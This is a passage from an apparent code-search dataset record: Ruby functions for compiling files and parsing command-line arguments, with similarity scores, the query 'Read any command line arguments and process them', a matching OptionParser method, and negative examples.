"def compile_from_command_line(args)\n compress = false\n if args.index(\"-c\") != nil or args.index(\"--compress\") != nil\n compress = true\n args = args.keep_if { |arg| [\"-c\", \"--compress\"].index(arg) == nil }\n end\n \n if args.index(\"-d\") != nil\n d_index = args.index(\"-d\")\n if args.length < d_index + 1\n raise Exception, \"The -d argument must be followed immediately by a directory path in which to compiler .wml files.\"\n end\n \n dir_path = args[d_index + 1]\n \n if !File.directory? dir_path\n raise Exception, \"Invalid directory path following -d argument.\"\n end\n \n Dir.chdir dir_path\n if args[\"-r\"] != nil\n Dir['**/*'].each { |f|\n if File.directory? f and ['.', '..'][f] == nil\n puts f\n compile_file_from_path(f, :strict => false, :compress => compress)\n end\n }\n else\n Dir['*'].each { |f|\n if File.directory? f and ['.', '..'][f] == nil\n puts f\n compile_file_from_path(f, :strict => false, :compress => compress)\n end\n }\n end\n \n else\n strict = true\n if args.index(\"-f\") != nil or args.index(\"--force\") != nil\n strict = false\n args = args.keep_if { |arg| [\"-f\", \"--force\"].index(arg) == nil }\n end\n \n args.each { |filepath|\n compile_file_from_path(filepath, :strict => strict, :compress => compress)\n }\n \n end\nend",
"def compile_main(exp)\n @e.main do\n # We should allow arguments to main\n # so argc and argv get defined, but\n # that is for later.\n @main = Function.new([],[])\n @global_scope = GlobalScope.new\n compile_eval_arg(FuncScope.new(@main, @global_scope), exp)\n end\n\n # after the main function, we ouput all functions and constants\n # used and defined so far.\n output_functions\n output_constants\n end",
"def create_compile_ext_tasks(source_root, dest_root, invoking_task)\n compiled_ext = \"#{source_root}/#{SPECIAL_BUNDLE_NAMES[File.basename(source_root)] || File.basename(source_root)}.bundle\"\n create_copy_file_tasks(FileList[compiled_ext], source_root, dest_root, invoking_task)\n file compiled_ext => FileList[\"#{source_root}/*.c\"] do\n cd source_root do\n `ruby extconf.rb; make >/dev/null 2>&1`\n end\n end\nend",
"def recompile\n @compiled = nil\n compile\n end",
"def compile\n Liberty.validate(@app_dir)\n @liberty_components_and_uris, @liberty_license = Liberty.find_liberty_files(@app_dir, @configuration)\n unless LibertyBuildpack::Util.check_license(@liberty_license, @license_id)\n print \"\\nYou have not accepted the IBM Liberty License.\\n\\nVisit the following uri:\\n#{@liberty_license}\\n\\nExtract the license number (D/N:) and place it inside your manifest file as a ENV property e.g. \\nENV: \\n IBM_LIBERTY_LICENSE: {License Number}.\\n\"\n raise\n end\n download_and_install_liberty\n link_application\n update_server_xml\n make_server_script_runnable\n download_and_install_features\n # Need to do minify here to have server_xml updated and applications and libs linked.\n minify_liberty if minify?\n overlay_java\n set_liberty_system_properties\n set_jdk_memory_configuration\n populate_class_cache if populate_class_cache_staging?\n end",
"def compile\r\n case language\r\n when :boolexp\r\n true\r\n when :fart\r\n @prog = Farts::Parser.new.parse(src)\r\n log.info \"Compile of FART program - #{name}\"\r\n true\r\n else\r\n false\r\n end\r\n rescue Exception\r\n log.error $!\r\n @prog = nil\r\n false\r\n end",
"def compile(script, filename=nil, linenum=nil)\n filename ||= 'none'\n linenum ||= 1\n native_compile(script, filename, linenum)\n end",
"def process(spec, argv)\n compile(spec)\n interpret(argv)\n self\n end",
"def compile_file(ctx, source)\n compile_string(ctx, File.read(source))\n rescue StandardError => e\n puts \"Error compiling file: #{source}\"\n raise e\n end",
"def compile(infile, outfile, asm)\n\n File.open(infile, 'r') do |input|\n File.open(outfile, 'wb') do |out|\n compiler = Compiler.new(input, asm)\n out.print(compiler.compile)\n end\n end\n\nrescue ParseError => e\n error(\"[error] #{e.message}\")\n error(\"[context] #{e.context}\")\n # error(\"Aborting!\")\n error(e.caller)\n exit(1)\nend"
] |
[
"0.6823948",
"0.6362989",
"0.63502246",
"0.61257815",
"0.60613436",
"0.60349697",
"0.60108215",
"0.6002097",
"0.59822905",
"0.5947855",
"0.5895054",
"0.5806892",
"0.57201964",
"0.57150155",
"0.57021344",
"0.56926584",
"0.56812584",
"0.5639252",
"0.56190336",
"0.5608342",
"0.55780905",
"0.55516464",
"0.55414695",
"0.55161566",
"0.5513474",
"0.54941696",
"0.54925865",
"0.5482381",
"0.5471589",
"0.5460296",
"0.5447598",
"0.5437917",
"0.5433732",
"0.54297906",
"0.54162353",
"0.5415956",
"0.5409241",
"0.53996015",
"0.5387614",
"0.5383013",
"0.5378252",
"0.53754526",
"0.5365138",
"0.5355655",
"0.53539217",
"0.53278196",
"0.5322133",
"0.53200763",
"0.53160346",
"0.53113437",
"0.53071964",
"0.5304031",
"0.5297035",
"0.5271057",
"0.5270507",
"0.5263752",
"0.52613395",
"0.5259612",
"0.5247219",
"0.52433777",
"0.524288",
"0.524288",
"0.5238153",
"0.5238153",
"0.5238153",
"0.5229328",
"0.52246994",
"0.52004683",
"0.5197226",
"0.5195545",
"0.5179402",
"0.5177416",
"0.5169128",
"0.51687986",
"0.5165627",
"0.51625586",
"0.5158402",
"0.5151984",
"0.5149459",
"0.5144559",
"0.5140605",
"0.5137559",
"0.5137371",
"0.5128883",
"0.5116478",
"0.5108768",
"0.51005536",
"0.5090945",
"0.5082664",
"0.50820166",
"0.5066214",
"0.50623226",
"0.5059677",
"0.50574976",
"0.5050094",
"0.5048028",
"0.50342774",
"0.50288546",
"0.50219786",
"0.5010694"
] |
0.78810585
|
0
|
Read any command line arguments and process them
|
def parse_command_line
OptionParser.new do |opts|
opts.banner = "Usage: ruby #{$0} [options]"
opts.on_head("-h", "--help", "Show this help message") do
puts opts
exit
end
opts.on("-v", "--verbose", "Show all progress messages (INFO, DEBUG, WARNING, ERROR)") do
Logger.verbose = true
end
opts.on("-q", "--quiet", "Only show WARNING and ERROR messages") do
Logger.quiet = true
end
opts.on("--console", "Open up a console to query the source via rbgccxml") do
@requesting_console = true
end
opts.on("--clean", "Force a complete clean and rebuild of this extension") do
@force_rebuild = true
end
end.parse!
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_arguments\n @args << \"-h\" if(@args.length < 1)\n \n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE','use the following local file') {|file| @options.file = File.expand_path(file)}\n opts.on('-p','--parse PARSE',\"sets which set of sider files to download #{@@sections.join(\"|\")}\") {|parse| @options.parse = parse}\n opts.on('-d','--download','download the file to be parsed') {@options.download = true}\n opts.on('-o','--output DIR','set the output directory') {|directory| @options.output = File.expand_path(directory)}\n opts.on('-h','--help',\"prints the help\"){puts opts; exit!}\n end\n \n opts_parse.parse!(@args) rescue raise \"There was an error processing command line arguments use -h to see help\"\n end",
"def process_args\n args = @args.dup\n @options[:operands] = nil\n unless args.length >= 2\n puts @opts\n exit 1\n end\n @options[:operands] = args.shift(2)\n @options[:output_filename] = args.shift unless args.empty?\n @options[:output] ||= @options[:output_filename] || $stdout\n\n run\n end",
"def process_args\n if has_directory?\n @directory_to_parse = @args[0]\n else\n @files = @args[0...@args.count-3]\n @owner = @args[@args.count-3]\n @repo = @args[@args.count-2]\n @token = @args[@args.count-1]\n end\n end",
"def process(args)\n args\n end",
"def parse_arguments\n @arguments = ARGV.collect { |arg| arg.strip }\n @filename = Pathname.new(@arguments.first)\n end",
"def processCommandLineOptions\n if ARGV\n ARGV.each do |arg|\n if arg.index('=')\n setting, value = arg.split('=')\n setting = setting.chomp\n value = value.chomp.strip\n if setting == 'logLevel'\n value = value.upcase.gsub(/\\'/,'')\n level = LEVELS_TEXT.index(value.upcase)\n @currentLogLevel = level if level\n elsif setting == 'consoleLogging'\n @consoleLogging = value.downcase == 'true'\n elsif setting == 'logfile'\n @currentFileName = File.expand_path(value)\n end\n end\n end\n end\n end",
"def handle_arguments(args)\n if input_file.nil?\n print_usage\n true\n else\n args.help || args.version\n end\n end",
"def setup\n begin\n @options = OptParser.parse(ARGV)\n rescue ParserExceptions::MissingArgument\n exit(1)\n end\n\n end",
"def parse argv\n parse_args argv do |argv, remaining_args, arg|\n remaining_args << arg\n end\n end",
"def parse_arguments(args)\n Trollop::with_standard_exception_handling argument_parser do\n if args.empty? || args.include?('-h') || args.include?('--help')\n raise Trollop::HelpNeeded\n elsif args.include?('--examples')\n print_examples\n end\n argument_parser.parse args\n end\n end",
"def process_args\n @options = { sequence_num: nil, directory: nil, verbose: false }\n\n @optparse = OptionParser.new do |opts|\n opts.banner = 'Usage: Upload directory to MOA repository'\n\n @options[:sequence_num] = nil\n opts.on( '-s', '--seq SEQ', Integer, 'disk upload sequence number' ) do |seq|\n @options[:sequence_num] = seq\n end\n\n @options[:batch] = 1\n opts.on( '-b', '--batch BATCH', Integer, 'Start from batch number' ) do |batch|\n @options[:batch] = batch\n end\n\n @options[:batchsize] = BATCH_SIZE\n opts.on( '-n', '--batchsize BATCHSIZE', Integer, 'Set Batch Size (Default 5000 files)' ) do |batchsize|\n @options[:batchsize] = batchsize\n end\n\n @options[:directory] = nil\n opts.on( '-d', '--dir DIR', String, 'directory to upload' ) do |dir|\n @options[:directory] = dir\n end\n\n @options[:verbose] = false\n opts.on( '-v', '--verbose', 'Output more information' ) do\n @options[:verbose] = true\n end\n\n opts.on( '-?', '--help', 'Display this screen' ) do\n puts opts\n exit\n end\n end\n\n @optparse.parse!\n\n if @options[:directory].nil? || @options[:sequence_num].nil?\n puts @optparse\n exit(-1)\n end\nend",
"def parse_args\n case ARGV[0]\n when '-a'\n # check that no arg was passed with the -a flag.\n if ARGV[1]\n puts \"Error, '-a' flag cannot accept additional arguments.\"\n puts \"Run `validate-pp -h` for more info.\"\n exit!\n end\n parse_directory(File.expand_path(Dir.pwd))\n when '-d'\n ARGV.shift\n ARGV.each do |d|\n unless File.directory?(d)\n puts \"Error, #{d} is not a directory.\"\n puts \"Run `validate-pp -h` for more info.\"\n exit!\n end\n end\n dirs = ARGV.map { |d| File.expand_path(d) }\n dirs.each { |d| parse_directory(d) }\n when \"-f\"\n ARGV.shift\n ARGV.each do |f|\n unless File.extname(f) == '.pp'\n puts \"Error, #{f} is not a '.pp' file\"\n puts \"Run `validate-pp -h` for more info.\"\n exit!\n end \n end\n ARGV.each { |f| PuppetFile.new(File.expand_path(f)) }\n when '-g'\n if ARGV[1]\n puts \"Error, '-g' flag cannot accept additional arguments.\"\n puts \"Run `validate-pp -h` for more info.\"\n exit!\n end\n parse_git_repo\n end\nend",
"def argv; argline.split(/ +/) unless argline.nil?; end",
"def parse_args\n parser = Trollop::Parser.new do\n opt :resume\n opt :verbose\n version \"\"\n end\n\n parse do\n parser.parse\n end\n end",
"def command_line\r\n ARGV.each do |arg|\r\n if arg == \"instructions\"\r\n instructions\r\n elsif arg == \"calculator\"\r\n ask_for_digits\r\n else\r\n \r\n end\r\n end\r\n \r\n end",
"def parse\n @opts = OptionParser.new { |opts| process_opts(opts) }\n @opts.parse!(@args)\n\n process_args\n\n @options\n end",
"def parsed_args\n args = Options.new('binnacle - Simple Test and Infra automation Framework')\n args.verbose = 0\n args.runner = false\n args.result_json = ''\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = 'Usage: binnacle [options] <testfile>'\n\n opts.on('-w', '--wide', 'Do not crop the task line') { args.wide = true }\n opts.on('-v', '--verbose', 'Verbose output') { args.verbose += 1 }\n opts.on('-r', '--runner', 'Run the tasks from a file (Internal use only)') { args.runner = true }\n opts.on('--results-json=FILE', 'Results JSON file') do |json_file|\n args.result_json = json_file\n end\n\n opts.on('-h', '--help', 'Prints this help') do\n puts opts\n exit\n end\n\n opts.on('--version', 'Show Version information') do\n puts \"Binnacle #{Binnacle::VERSION}\"\n exit\n end\n end\n\n opt_parser.parse!(ARGV)\n\n if ARGV.empty?\n warn 'Task file is not specified'\n exit EXIT_INVALID_ARGS\n end\n\n args.task_files = ARGV\n args\nend",
"def read_arguments\n\tif (ARGV.length() < 2)\n\t\traise ArgumentError, \"Invalid number of arguments, \\n correct usage 'ruby ./661561-project-one.rb <input_file> <regression_type>'\"\n\tend\n\t\n\tfilename = ARGV[0]\n\tregression_type = ARGV[1]\n\n\tif !(VALID_REGRESSIONS.include? regression_type)\n\t\traise ArgumentError, 'Regression type is not valid.'\t\n\tend\n\n\treturn filename, regression_type\n\nend",
"def run\n begin\n process_arguments\n rescue ArgumentError\n output_usage\n end\n end",
"def parse_command_line args\n args.options do |opt|\n opt.on(\"rutema v#{Version::STRING}\")\n opt.on(\"Options:\")\n opt.on(\"--config FILE\", \"-c FILE\",String,\"Loads the configuration from FILE\") { |config_file| @config_file=config_file}\n opt.on(\"--check\",\"Runs just the suite setup test\"){@check=true}\n #opt.on(\"--step\",\"Runs test cases step by step\"){@step=true}\n opt.on(\"--silent\",\"Suppresses console output (only for the default reporters)\") { @silent=true}\n opt.on(\"--bare\",\"No default reporters whatsoever\") { @bare=true}\n #opt.on(\"--color\",\"Adds color to the Console reporter\") { @color=true}\n opt.on(\"-v\", \"--version\",\"Displays the version\") { $stdout.puts(\"rutema v#{Version::STRING}\");exit 0 }\n opt.on(\"--help\", \"-h\", \"-?\", \"This text\") { $stdout.puts opt; exit 0 }\n opt.on(\"--debug\", \"-d\", \"Turn on debug messages\") { $DEBUG=true }\n opt.on(\"You can provide a specification filename in order to run a single test\")\n opt.parse!\n #and now the rest\n unless @config_file\n puts \"No configuration file defined!\\n\"\n $stdout.puts opt \n exit 1\n end\n if !args.empty?\n @test_identifier=args.shift\n end\n end\n end",
"def run\n @arguments = ArgumentParser.get_arguments VALID_ARGUMENTS\n print_help if (@arguments[:options][:help])\n print_version if (@arguments[:options][:version])\n if (@arguments[:keywords][:export])\n handle_export\n elsif (@arguments[:keywords][:import])\n handle_import\n else\n print_help\n end\n end",
"def parse_arguments\n\toptions = {}\n\t\n\toptparse = OptionParser.new do|opts| \n\t\t# Set a banner, displayed at the top \n\t\t# of the help screen. \n\t\topts.banner = \"Usage: ruby #{$0} [options] file1 file2...\"\n\n\t\t#Figure out the framerate\n\t\toptions[:framerate] = DEFAULT_FRAMERATE\n\t\trates = [23.976, 23.98, 24, 25, 29.97, 30, 50, 59.94, 60]\n\t\topts.on('-f', '--framerate RATE', Float, \"The framerate of your sequence. Defaults to #{DEFAULT_FRAMERATE}. Acceptable rates: #{rates}\") do |fr|\n\t\t\tif !rates.include?(fr)\n\t\t\t\tputs \"Invalid framerate. Must be one of: #{rates}.\".red\n\t\t\t\texit\n\t\t\tend\n\t\t\toptions[:framerate] = fr\n\t\tend\n\n\t\t# This displays the help screen, all programs are\n\t\t# assumed to have this option. \n\t\topts.on( '-h', '--help', 'Display this screen' ) do\n\t\t\tputs opts\n\t\t\texit\n\t\tend\n\n\tend\n\n\t#Parse the options we've set above.\n\t#Whatever is left goes into ARGV\n\toptparse.parse!\n\n\t#XML requirements. Timebase is the round number closest to the framerate\n\ttimebase = options[:framerate].round\n\tntsc = \"FALSE\"\n\n\t#NTSC is true if the true framerate is not a round number\n\t#NTSC should be true if the framerate does not match the timebase\n\tif timebase != options[:framerate]\n\t\tntsc = \"TRUE\"\n\tend\n\n\toptions[:timebase] = timebase\n\toptions[:ntsc] = ntsc\n\n\tif ARGV.length == 0\n\t\tputs \"No files listed.\".red\n\t\texit\n\tend\n\n\t#Parse out the remaining files\n\toptions[:files] = Array.new(ARGV)\n\t \n\treturn options\nend",
"def process_argv!\n args = ARGV.dup\n self.rest = []\n until args.empty? do\n arg = args.shift\n case\n when arg == '--'\n self.rest += args\n break\n when arg =~ /\\A--([\\w\\-\\.]+)(?:=(.*))?\\z/\n param, val = [$1, $2]\n param.gsub!(/\\-/, '.') # translate --scoped-flag to --scoped.flag\n param = param.to_sym unless (param =~ /\\./) # symbolize non-scoped keys\n if val == nil then val = true # --flag option on its own means 'set that option'\n elsif val == '' then val = nil end # --flag='' the explicit empty string means nil\n self[param] = val\n when arg =~ /\\A-(\\w+)\\z/\n $1.each_char do |flag|\n param = param_with_flag(flag)\n self[param] = true if param\n end\n else\n self.rest << arg\n end\n end\n end",
"def read_input_params options_cli={}\n #utility sub\n def find_first_yaml_file(dir_to_process)\n Dir.chdir(dir_to_process)\n yaml_file = nil\n Dir.glob(\"*.{yaml,yml}\") do |file|\n yaml_file = file\n break\n end \n return yaml_file\n end\n\n # read input args\n dir_to_process = Dir.pwd\n fail(\"#{dir_to_process} does not exist\") unless File.exist?(dir_to_process) \n fail(\"#{dir_to_process} is not a Directory\") unless File.directory?(dir_to_process)\n $log.info \"Dir to be processed: #{dir_to_process}\"\n \n yaml_name = options_cli['--event']||find_first_yaml_file(dir_to_process)\n fail(\"- no YAML File found;\") if yaml_name.nil? \n fail(\"- no YAML File found;\") unless File.file?(yaml_name)\n $log.info \"YAML Profile to be processed: #{yaml_name}\"\n return [dir_to_process, yaml_name]\nend",
"def parse_args()\r\n\t\tfor arg in ARGV\r\n\t\t\tif arg == \"-d\"\r\n\t\t\t\t@daemonize = true\r\n\t\t\telsif arg == \"development\" || arg == \"production\"\r\n\t\t\t\t@db_env = arg\r\n\t\t\tend\r\n\t\tend\r\n\t\tputs \"Using DB: #{@db_env}\"\r\n\tend",
"def parse_args(args)\n options = {\n :excount => 5,\n :testdata => nil,\n :console => false,\n :raw => false,\n :pronounciation_offset => 1,\n :definition_offset => 2,\n :url => \"m\"\n }\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = \"Usage: #{$0} <input filepath> [options]\"\n\n opts.separator \"\"\n opts.separator \"Data options:\"\n opts.on(\"-p N\", Integer, \"Offset to pronunciation column, default 1\") do |n|\n options[:pronounciation_offset] = n\n end\n opts.on(\"-d N\", Integer, \"Offset to definition column, default 2\") do |n|\n options[:definition_offset] = n\n end\n opts.on(\"-n N\", Integer, \"Number of example sentences, default 5\") do |n|\n options[:excount] = n\n end\n opts.on(\"-u U\", String, \"Source url (#{WWWJDICExampleProvider::SOURCES.to_s}), default #{options[:url]}\") do |u|\n options[:url] = u\n end\n\n opts.separator \"\"\n opts.separator \"Testing:\"\n opts.on(\"-t\", \"--testdata [DATAFILE]\",\n \"Path to yaml data file of examples (useful for testing)\") do |d|\n options[:testdata] = d\n end\n\n opts.separator \"\"\n opts.separator \"Output:\"\n opts.on(\"-c\", \"--console\", \"Dump to console only\") do |c|\n options[:console] = c\n end\n opts.on(\"-r\", \"--raw\", \"Output raw data (all examples)\") do |c|\n options[:raw] = c\n end\n\n opts.separator \"\"\n opts.on_tail(\"-h\", \"--help\", \"Show this message\") do\n puts opts\n exit\n end\n end\n\n opt_parser.parse!(args)\n options\nend",
"def process_inputs(args)\n @input = ((name = args[:in_file]) && (IO.read(name, mode: \"rb\"))) ||\n args[:in_str] ||\n fail(\"An input must be specified.\")\n\n @generator = args[:generator] ||\n ((key = args[:key]) && Generator.new(key)) ||\n fail(\"A key or generator must be specified.\")\n\n @window = args[:window] || 16\n\n #The filler value is for testing purposes only. It should\n #not be specified when secure operation is desired.\n @fill_value = args[:filler]\n end",
"def parse_arguments\n @command_line_options = {}\n @config.insert 0, '<command_line>', @command_line_options\n\n @options = OptionParser.new do |opts|\n opts.on('-a', '--application STRING', 'set application name') do |application|\n @command_line_options[:application] = application\n end\n\n opts.on('-d', '--destination DIR', 'set destination directory', \"default: #{@config[:destination_directory]}\") do |directory|\n @command_line_options[:destination_directory] = directory\n end\n\n opts.on('-n', '--dryrun', 'do not switch') do\n @command_line_options[:dryrun] = true\n end\n\n opts.on('-V', '--version STRING', 'set application version to deploy') do |version|\n @command_line_options[:version] = version\n end\n end\n @options.parse!\n end",
"def process_argv!\n args = ARGV.dup\n self.rest = []\n @unknown_argvs = []\n until args.empty? do\n arg = args.shift\n case\n # end of options parsing\n when arg == '--'\n self.rest += args\n break\n # --param=val or --param\n when arg =~ /\\A--([\\w\\-\\.]+)(?:=(.*))?\\z/\n param, val = [$1, $2]\n warn \"Configliere uses _underscores not dashes for params\" if param.include?('-')\n @unknown_argvs << param.to_sym if (not has_definition?(param))\n self[param] = parse_value(val)\n # -abc\n when arg =~ /\\A-(\\w\\w+)\\z/\n $1.each_char do |flag|\n param = find_param_for_flag(flag)\n unless param then @unknown_argvs << flag ; next ; end\n self[param] = true\n end\n # -a val\n when arg =~ /\\A-(\\w)\\z/\n flag = find_param_for_flag($1)\n unless flag then @unknown_argvs << flag ; next ; end\n if (not args.empty?) && (args.first !~ /\\A-/)\n val = args.shift\n else\n val = nil\n end\n self[flag] = parse_value(val)\n # -a=val\n when arg =~ /\\A-(\\w)=(.*)\\z/\n flag, val = [find_param_for_flag($1), $2]\n unless flag then @unknown_argvs << flag ; next ; end\n self[flag] = parse_value(val)\n else\n self.rest << arg\n end\n end\n @unknown_argvs.uniq!\n end",
"def process_commandline_args\n\n params = { :sidelength => 1, :mult => 10, :stroke_width => 1,\n :cols => 3, :rows => 3,\n :nested => 1, :nested_spacing => 0.2,\n :suppress_grid => false,\n :moveto_color => '#0000ff', :lineto_color => '#ff0000',\n :xshift => 0, :yshift => 0, :gcode => false, :do_tform => false\n }\n\n ARGV.each { |a|\n if v = a.match(/^--side-length=([0-9.]+)$/) then params[:sidelength] = v[1].to_f\n elsif v = a.match(/^--cols=([0-9]+)$/) then params[:cols] = v[1].to_i\n elsif v = a.match(/^--rows=([0-9]+)$/) then params[:rows] = v[1].to_i\n elsif v = a.match(/^--nested=([0-9]+)$/) then params[:nested] = v[1].to_i\n elsif v = a.match(/^--nested-spacing=(0?\\.[0-9]+)$/) then params[:nested_spacing] = v[1].to_f\n elsif v = a.match(/^--suppress-grid(=([01]))?$/) then params[:suppress_grid] = (v[1].nil? || v[2] == \"1\")\n elsif v = a.match(/^--mult=([.0-9e]+)$/) then params[:mult] = v[1].to_f\n elsif v = a.match(/^--stroke-width=([.0-9]+)$/) then params[:stroke_width] = v[1].to_f\n elsif v = a.match(/^--moveto-color=(none|#(\\h{3}|\\h{6}))$/)\n then params[:moveto_color] = v[1]\n elsif v = a.match(/^--lineto-color=(none|#(\\h{3}|\\h{6}))$/)\n then params[:lineto_color] = v[1]\n elsif v = a.match(/^--xshift=([-.0-9]+)$/) then params[:xshift] = v[1].to_f\n elsif v = a.match(/^--yshift=([-.0-9]+)$/) then params[:yshift] = v[1].to_f\n elsif v = a.match(/^--gcode$/) then params[:gcode] = true\n elsif v = a.match(/^--apply-maths$/) then params[:do_tform] = true\n else abort \"\\nArborting!!! -- Error: unknown argument #{a}\\n\\n\"\n end\n }\n\n params\nend",
"def process_arguments\n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE') {|f|@options.file = File.expand_path(f)}\n opts.on('-o','--output FILE'){|f|@options.output = File.expand_path(f)}\n end\n \n opts_parse.parse!(@arguments) rescue return false\n \n return true\n end",
"def process_arguments\n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE') {|f|@options.file = File.expand_path(f)}\n opts.on('-o','--output FILE'){|f|@options.output = File.expand_path(f)}\n end\n \n opts_parse.parse!(@arguments) rescue return false\n \n return true\n end",
"def process_arguments\n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE') {|f|@options.file = File.expand_path(f)}\n opts.on('-o','--output FILE'){|f|@options.output = File.expand_path(f)}\n end\n \n opts_parse.parse!(@arguments) rescue return false\n \n return true\n end",
"def process_arguments\n opts_parse = OptionParser.new do |opts|\n opts.on('-f','--file FILE') {|f|@options.file = File.expand_path(f)}\n opts.on('-o','--output FILE'){|f|@options.output = File.expand_path(f)}\n end\n \n opts_parse.parse!(@arguments) rescue return false\n \n return true\n end",
"def process_arguments\n @e_addr = @options.email\n @r_name = @options.run_names\n @m_name = @options.machine_names\n @action = @options.action\n @snfs = @options.snfs\n end",
"def parse_args\n args = {\n :stack_name => nil,\n :parameters => {},\n :interactive => false,\n :region => default_region,\n :profile => nil,\n :nopretty => false,\n :s3_bucket => nil,\n }\n ARGV.slice_before(/^--/).each do |name, value|\n case name\n when '--stack-name'\n args[:stack_name] = value\n when '--parameters'\n args[:parameters] = Hash[value.split(/;/).map { |pair| parts = pair.split(/=/, 2); [ parts[0], Parameter.new(parts[1]) ] }]\n when '--interactive'\n args[:interactive] = true\n when '--region'\n args[:region] = value\n when '--profile'\n args[:profile] = value\n when '--nopretty'\n args[:nopretty] = true\n when '--s3-bucket'\n args[:s3_bucket] = value\n end\n end\n\n args\nend",
"def parse_args\n\t\t@args = @args_a.each_slice(2).to_a.inject({}) { |h, k| h[k[0]] = k[1]; h }\n\t\tkeys = @skeys + @lkeys\n\t\t@args.each do |k, v|\n\t\t\tif !keys.include?(k)\n\t\t\t\tputs \"Unknown option `#{k}'\"\n\t\t\t\texit\n\t\t\tend\n\n\t\t\tif keys.include?(v)\n\t\t\t\tputs \"Missing values for `#{k}' and `#{v}'\"\n\t\t\t\texit\n\t\t\tend\n\n\t\t\tif v != nil\n\t\t\t\tif v.start_with?('-')\n\t\t\t\t\tputs \"Warning: Value of `#{k}' appears to be a flag\"\n\t\t\t\tend\n\n\t\t\t\tif @static.has_key?(k)\n\t\t\t\t\tif !@static[k].include?(v)\n\t\t\t\t\t\tputs \"Unknown option `#{v}' for `#{k}'\"\n\t\t\t\t\t\texit\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t\n\t\tif remove_keys(@no_vals).has_blank?\n\t\t\tputs \"Missing argument(s)\"\n\t\t\texit\n\t\tend\t\t\t\n\tend",
"def parse_arguments\n OptionParser.new do |parser|\n # parser.banner = \"Usage: init.rb -c <integer>\"\n parser.on(\"-c\", \"--count COUNT\", Integer, \"Specify number of uuid's to generate\") do |c|\n @options[:count] = c\n end\n parser.on(\"-f\", \"--file FILE\", \"Specify path to save csv file example -f '/path/to/file.csv'\") do |path|\n @options[:path] = path\n end\n end.parse!\n end",
"def parse_command_line()\n opts = GetoptLong.new(\n [ \"--input-file\" , \"-i\", GetoptLong::REQUIRED_ARGUMENT ],\n [ \"--verbose\" , \"-v\", GetoptLong::NO_ARGUMENT ]\n )\n #----------------------------- defaults\n\n opts.each do |opt, arg|\n if (opt == \"--input-file\" ) ; $input_file = arg\n elsif (opt == \"--verbose\" ) ; $verbose = 1\n end\n\n if ($verbose != 0) ; puts \"Option: #{opt}, arg #{arg.inspect}\" ; end\n end\nend",
"def run(argv = ARGV)\n parser.parse(argv)\n end",
"def process_arguments\n if arguments_valid? \n process_command\n else\n raise ArgumentError\n end\n end",
"def command_parse(argv)\n end",
"def parse_args()\n opts = GetoptLong.new(\n ['--host', GetoptLong::OPTIONAL_ARGUMENT],\n ['--port', GetoptLong::OPTIONAL_ARGUMENT],\n ['--columns', GetoptLong::OPTIONAL_ARGUMENT],\n ['--index', GetoptLong::REQUIRED_ARGUMENT],\n ['--type', GetoptLong::REQUIRED_ARGUMENT]\n )\n\n opts.each do |opt, arg|\n case opt\n when '--host'\n @host = arg\n when '--port'\n @port = arg\n when '--columnns'\n @cols = arg.split(\",\")\n when '--index'\n @index = arg\n when '--type'\n @type = arg\n end\n end\n\n if @index.nil?\n STDERR.puts 'missing argument: --index'\n exit 1\n end\n\n if @type.nil?\n STDERR.puts 'missing argument: --type'\n exit 1\n end\n\n if ARGV.length != 1\n STDERR.puts 'Missing argument: file'\n exit 1\n end\n\n @file = ARGV.shift\nend",
"def argv; end",
"def process_arguments(args)\n begin\n args.keys.sort.each do |k,v|\n case k\n when :quickpkg\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gotdevtools?\n raise BoilerMakerErr.new(MSG_NO_DEVTOOLS)\n exit $!\n end\n unless Boilermaker.gothdiutil? \n raise BoilerMakerErr.new(MSG_NO_HDIUTIL)\n exit $!\n end\n project = QuickPkg.new(args)\n # pp project.vars\n project.prep(args)\n project.build(args)\n when :createproj\n project = PkgProj.new(args)\n project.prep\n when :ktcheck\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gotradmind? \n raise BoilerMakerErr.new(MSG_NO_RADMIND)\n exit $!\n end\n Radmind.updateK(args)\n when :tconvert\n Radmind.convert(args)\n when :fetch\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gotradmind? \n raise BoilerMakerErr.new(MSG_NO_RADMIND)\n exit $!\n end \n Radmind.fetch(args)\n when :boil\n project = PkgProj.new(args)\n project.boil\n when :rollup\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gothdiutil? \n raise BoilerMakerErr.new(MSG_NO_HDIUTIL)\n exit $!\n end\n project = PkgProj.new(args)\n project.rollup\n when :package\n unless Boilermaker.gotroot? \n raise BoilerMakerErr.new(MSG_NO_ROOT)\n exit $!\n end\n unless Boilermaker.gotdevtools?\n raise BoilerMakerErr.new(MSG_NO_DEVTOOLS)\n exit $!\n end\n project = PkgProj.new(args)\n project.package(args)\n end\n end\n rescue => error\n puts error.message + \"\\n\"\n exit 1\n end\n \n end",
"def parse_args\n { :ip => ARGV[1] || '0.0.0.0', :port => (ARGV[0] || '9000').to_i,\n :logging => !(ENV['DEBUG'] &&\n ['0', 'no', 'false'].include?(ENV['DEBUG'].downcase)) }\nend",
"def parse_args\n doc = <<DOCOPT\nschwifty saves and downloads objects from ipfs, keeping track of their hashes in a garbage collection file in ~/.ipfs/ipfs_pinned_objects.yaml and an objects file in ./ipfs_objects.yaml\n\nUsage:\n schwifty add <files>...\n schwifty bootstrap (--clear | <nodes>... | --file=<bootstrap_list_yaml>)\n schwifty get <files_or_hashes>...\n schwifty gc\n schwifty -h | --help\n schwifty --version\n\nOptions:\n -h --help Show this screen.\n --version Show version.\nDOCOPT\n begin\n Docopt.docopt(doc)\n rescue Docopt::Exit => e\n puts e.message\n exit\n end\n end",
